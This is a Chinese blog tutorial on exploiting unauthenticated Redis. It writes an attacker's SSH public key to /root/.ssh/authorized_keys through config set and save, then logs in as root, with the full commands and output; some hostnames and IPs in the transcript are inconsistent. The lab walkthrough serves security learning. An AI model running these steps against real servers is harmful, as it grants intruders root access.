redis未授权访问漏洞

最新推荐文章于 2024-08-08 22:25:04 发布
最新推荐文章于 2024-08-08 22:25:04 发布
阅读量383 收藏 7
点赞数 4
分类专栏: 网络安全 文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuge_long/article/details/139011335
版权

8 redis未授权访问漏洞

利用redis漏洞,getshell,我们需要利用RDB还是AOF?

肯定是RDB,因为RDB是二进制文件的格式!!!!

前置条件:

  1. redis提供了在线修改配置文件的功能 config set,实现任意文件写入功能。
  2. redis一般新手都会忘记设置密码,也不会修改默认端口。
  3. 就算有密码,难度很低,很容易被暴破!因为没有账号,也没有密码错误次数限制。同时错误后有错误消息返回。所以就满足暴破条件。
  4. redis支持save触发RDB持久化!把二进制文件写入任意目录。

利用redis的持久化rdb文件进行公钥写入,将你自己的公钥写入别人的redis中,在对其redis进行保存为持久化文件,持久化文件的路径需要是/root/.ssh/,且文件的持久化命名需要是authorized_keys

8.1 环境准备

  1. redis开启外网访问
  2. redis的端口已知或者已经爆破出来,6000-7000,6379
  3. redis的密码已知或者已经爆破
  4. redis开启在线修改功能
  5. redis开启save保存功能
  6. Linux有.ssh这个文件夹 本地安装的怕是没有 远程服务器必有

8.2 攻击机生成公钥

命令:

[root@iptables ~]# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:8aKP+mROOBAIlDtXP+Eiq6vFztKpP4z92D9sOIQgHBo root@localhost.localdomain
The key's randomart image is:
+---[RSA 2048]----+
|o..              |
|E+   . .         |
|+.+ . o o        |
|++ + . + o       |
|..+.o . S .      |
| ..o.. . .       |
| =+ooo=          |
|o=*oo*+o         |
|+=*o+*=..        |
+----[SHA256]-----+

8.3 拼写公钥写入文件

1. 进入 /root/.ssh
cd /root/.ssh

2. 在公钥前后使用\n换行,然后把内容重定向到一个文件中,等会就可以使用文件操作,括号不能省略,否者就变成屏幕输出了
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > ./keys

查看keys文件:

image-20240515112531208

8.4 攻击机

攻击机通过redis-cli把自己的公钥,写入到了靶机的redis数据库中的字符串keys

靶机的redis-server中有一个字符串keys里面就有了攻击机的公钥

靶机

[root@target .ssh]# /opt/redis/bin/redis-cli -h 192.168.190.133 -x set keys < ./keys 
OK
[root@target .ssh]# /opt/redis/bin/redis-cli -h 192.168.190.133
192.168.190.133:6379> get keys
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD7QcripQWmO3Gbz9b6Cf7IOsEHC6oxEXwvRRuOBb3gjXuXlOg+uyY6bjL2PkbAaWrn+fwzN4FcHaPG2kiJ5uQYy3mNVIEAZYEKP3b6iflc0p03GcMNI2YENtXiz2aChsM7ky/XUVc4ashpvI/soDnHCC8gi0sNQIy/Tq3jmZwBgAqbFgBe+7N+MMAioAJDANxH7GBWG7gl4WqaMcETz/AtjFELcWK8OtbYQ6oFnkc3UGshKmBd6qJUgIE6ZhYH9kuQ12Em0+uRI3IeVtFDNr30S2lvnDYN5zR4A/O0yKwU/U4HlMud1rw6UoAUm+BjuCIfiSjsWx1ovW7Ztnfs32T9 root@target\n\n\n\n"
192.168.190.133:6379>

8.5 修改redis配置

# 1)先使用攻击机登录靶机的redis-server
[root@target .ssh]# /opt/redis/bin/redis-cli -h 192.168.190.133

# 2) 修改靶机的配置
192.168.7.52:6379> config set dir /root/.ssh # dir是rdb文件持久化保存目录
192.168.7.52:6379> config set dbfilename authorized_keys #rbd文件名
192.168.7.52:6379> save #手动触发持久化,生成公钥文件

8.6 ssh使用私钥进行远程连接

#使用-i执行私钥文件路径,就可以实现远程getshell登录
[root@iptables .ssh]# ssh -i /root/.ssh/id_rsa root@192.168.190.133
Last login: Mon Nov 13 18:59:59 2023 from 192.168.7.25
[root@Centos-4 ~]#

8.7 数据流转

image-20240517174359457

蜗牛学苑_武汉
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
02-Redis授权访问漏洞
qq_57410330的博客
07-16 891
详谈redis授权访问漏洞,原理、利用及加固方式
Redis授权访问漏洞
周星星的博客
08-22 1361
Redis授权访问漏洞复现以及利用
redis 授权访问漏洞
weixin_60719780的博客
03-02 2116
Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Redis授权访问漏洞复现
weixin_55123346的博客
06-26 1118
Redis漏洞复现
redis授权访问漏洞复现
zkaqlaoniao的博客
06-27 435
攻击者在授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
redis 授权访问漏洞详解
m0_69043895的博客
04-22 1298
1、redis 绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2、没有设置密码认证(默认密码为空),可以免密码远程登录redis服务。
Redis授权访问漏洞实验
qq_60256199的博客
10-09 3111
Redis是一个开源的内存数据库管理系统,它被广泛用于缓存、消息队列和实时数据分析等应用场景。Redis支持多种数据结构,包括字符串、列表、集合、有序集合和哈希表,可以通过简单的键值对方式存储和检索数据。由于其高性能和低延迟特性,Redis常用于加速数据访问,提高应用程序的响应速度。此外,Redis还提供了持久化选项,允许数据在重启后仍然可用,使其适用于各种持久性存储需求。这一特性使得Redis成为了一个非常强大的数据存储和缓存解决方案,特别适用于需要快速读写操作的应用场景。
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3284
Redis是一款内存高速缓存数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3539
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库缓存和消息队列。
Redis-管道
weixin_62485485的博客
08-04 368
原生批量命令是原子性(例如:mset,mget),pipeline是非原子性原生批量命令一次只能执行一种命令,没办法跨数据类型,pipeline支持批量执行不同命令原生批命令是服务端实现,而pipeline需要服务端与客户端共同完成。
ubuntu20.04安装部署nginx+php7.4+mysql8.0+redis
q123q123q_的博客
08-06 249
对于特定版本的 Nginx,您可能需要从官方源安装。但通常情况下,Ubuntu 的默认源中提供的版本已经足够新。在 Ubuntu 20.04 中,Nginx 的版本可能不是 1.24,但我们可以先安装默认版本。完成上述步骤后,您应该已经在 Ubuntu 20.04 上成功安装了 MySQL 8.0、PHP 7.4、Nginx 和 Redis。请注意,具体版本可能会有所变化,尤其是 Nginx 的版本,如果需要特定版本,您可能需要手动编译安装或者寻找第三方提供的软件包。2、设置root用户的密码。
Redis之golang编程实战
最新发布
choice~的博客
08-08 464
Redis字符串存储字节序列,包括文本、序列化对象和二进制数组。因此,字符串是最基本的Redis数据类型。它们通常用于缓存,但它们支持额外的功能,允许您实现计数器并执行按位操作。默认情况下,string 的最大尺寸为:512MB。大多数的 string 操作时间复杂度为:O(1)。但 SUBSTR, GETRANGE, SETRANGE 命令的时间复杂度为O(n)。Redis位图是字符串数据类型的扩展,可以将字符串视为位向量。您还可以对一个或多个字符串执行按位操作。
Redis作为缓存,如何与MySql的数据进行同步?
尚未佩妥剑 转眼便江湖
08-05 186
Redis作为缓存,如何与MySql的数据进行同步
Redis 进阶】Redis 典型应用 —— 分布式锁
Elena's Blog
08-08 492
什么是分布式锁。
谷粒商城实战笔记-152-缓存-缓存使用-整合Redis
epitomizelu的专栏
08-08 489
通过这种方式,Spring Boot Starter Data Redis 使得开发者无需编写大量的样板代码来集成 Redis,只需通过简单的配置即可快速使用 Redis 提供的各种功能。Spring Boot Starter Data Redis 是 Spring Boot 提供的一个自动配置的依赖项,它简化了在 Spring 应用中集成 Redis 的过程。是一个Spring Boot的"Starter"依赖,它主要的作用是简化了在Spring Boot应用程序中集成Redis的配置和使用。
Redis 大Key排查与优化
Jc0803kevin的专栏
08-08 535
bigkey简单来说就是存储本身的key值空间太大,或者hash,list,set等存储中value值过多。没有具体的衡量标准。
Redis十大类型总体叙述
qq_74851649的博客
08-05 943
1.String(字符串) String是Redis最基本的数据类型,也是最常用的数据类型 一个键最大能存储512MB的数据 可以存储字符串、整数、浮点数等 支持对字符串的部分修改、自增自减等操作 String类型是二进制安全的,这意味着它可以包含任何数据,比如jpg图片或者序列化的对象。 2. Hash(哈希) Hash是一个键值对集合,类似于Java中的HashMap 在Redis中它是以k1 filed v1存储的 每个Hash可以存储2^32-1个键值对 适合存储对象,如用户信息等
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值